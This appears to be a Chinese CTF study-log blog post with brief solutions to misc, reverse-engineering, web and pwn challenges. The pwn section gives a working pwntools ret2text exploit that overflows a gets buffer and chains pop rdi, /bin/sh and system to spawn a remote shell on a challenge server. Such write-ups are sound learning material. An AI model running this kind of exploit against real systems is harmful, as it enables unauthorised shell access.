2.12学习记录

misc

套娃

下载附件后得到一个Excel文档,但是打不开根据查阅,Excel本质上也是压缩包,就一直解压直到解压不了为止在这里插入图片描述文件中大量出现rc4提示,可能与rc4加密有关,rc4key是个加密压缩包,用010看看旁边那个压缩包在这里插入图片描述在最后找到了密码,根据前面得到的密文去解密得到key=ABCDEFGHIJKLMNOPQRSTUVWXYZ在这里插入图片描述加上flag的框就是答案了

re

[2021 HDCTF]easy_re

先查壳
在这里插入图片描述发现有upx壳,脱一下壳在这里插入图片描述之后用ida找到主调函数在这里插入图片描述调用函数比较加密后的字符s与a,所以需要找到加密方式在这里插入图片描述找到密文了在这里插入图片描述找到加密方式是base64而且没有换表在这里插入图片描述赛博厨师炒一下

内涵的软件

先查壳在这里插入图片描述发现没壳,用ida打开查看,先找到主调函数在这里插入图片描述发现调用了main_0函数在这里插入图片描述上面有一串长得像flag的字符串,把前缀换为flag即可

web

post-the-get

进入环境点击界面提示表单已经损坏了在这里插入图片描述在控制台查看源码在这里插入图片描述根据提示post,将get请求改为post请求,发现post按钮点不到,删除dis(disabled)即可

pwn

Ret2text

看名字就知道是栈溢出,拿到附件先用ida看一下在这里插入图片描述继续追踪,发现了gets函数,存在栈溢出在这里插入图片描述而且存在bin/sh后门函数
exp:

from pwn import *
io=process('./pwn')
io=remote("114.67.175.224",15740)
elf=ELF('./pwn')
pop_rdi=0x401196
binsh=0x402008
ret=0x40101a
shell=elf.plt['system']
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)
io.recv()
io.sendline(payload)
io.interactive()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值